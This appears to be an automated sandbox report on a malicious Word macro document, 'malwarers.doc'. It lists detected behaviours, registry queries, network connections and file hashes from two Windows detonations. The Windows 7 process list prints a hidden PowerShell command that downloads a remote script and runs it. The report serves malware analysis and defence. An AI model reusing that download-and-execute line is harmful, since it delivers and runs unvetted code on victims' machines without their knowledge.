Analysis Overview
SHA256
1c8d2db41d2ffc6da5c52a203ec8be94253c35b27e073447889c8af3cfa1be4f
Threat Level: Known bad
The file malwarers.doc was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Office macro that triggers on suspicious action
Suspicious Office macro
Command and Scripting Interpreter: PowerShell
Drops file in Windows directory
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-06 07:40
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 07:40
Reported
2024-08-06 07:42
Platform
win7-20240708-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\malwarers.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe –WindowStyle Hidden IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.246/1234567892222.ps1')
Network
| Country | Destination | Domain | Proto |
| N/A | 192.168.1.246:80 | N/A | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 5bee31d15c6798f4c4bfbc5a4ef5b0d0 |
| SHA1 | 668b03bb264b53f1f5823e7ead171e3bb2401a4b |
| SHA256 | 221e7e293a207ff04e68cac0771533f8adebd3f0937ae08cdb808c9632d765f6 |
| SHA512 | a727c46a2c396b1e9b97a284ca2645819bc319d7eafda82cf3f412170d5674325d793cb3816a86945fef009f811f501b58725e7429e5bf596e74084b585492c1 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-06 07:40
Reported
2024-08-06 07:42
Platform
win10v2004-20240802-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\malwarers.doc" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| GB | 2.17.209.123:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 123.209.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.252.19.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 3df0e89b413fe2ff36c8610f7493536f |
| SHA1 | 68315e1f8e1e0cfe67581106ebffbd87ac278b52 |
| SHA256 | 75eeea8e4d37197d179809004fed94cdd6eae1b32ce794853fe8e7da42c2cf85 |
| SHA512 | 9df311530c7ec4f62adbd7b60d51a683aa84adcc49136b3e0765c215666dc95e325b8affc34be6cc31703a81ffc66a1e3025fed137264d6f87dcd65e267c0a1e |
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl
| MD5 | ff0e07eff1333cdf9fc2523d323dd654 |
| SHA1 | 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4 |
| SHA256 | 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5 |
| SHA512 | b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d |